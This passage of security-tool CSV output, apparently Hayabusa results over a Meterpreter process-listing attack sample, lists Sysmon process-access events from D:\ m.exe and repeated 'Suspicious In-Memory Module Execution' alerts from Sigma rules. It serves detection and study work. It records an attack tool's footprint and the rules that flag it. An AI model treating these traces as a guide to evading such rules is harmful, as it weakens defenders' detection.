C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 
365ABB72-F6A2-5CC7-0000-00105FB40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 
365ABB72-F6A4-5CC7-0000-001020BA0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 
| Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: 
%TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 
+09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 
+09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 
365ABB72-F6CA-5CC7-0000-001017C50600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src 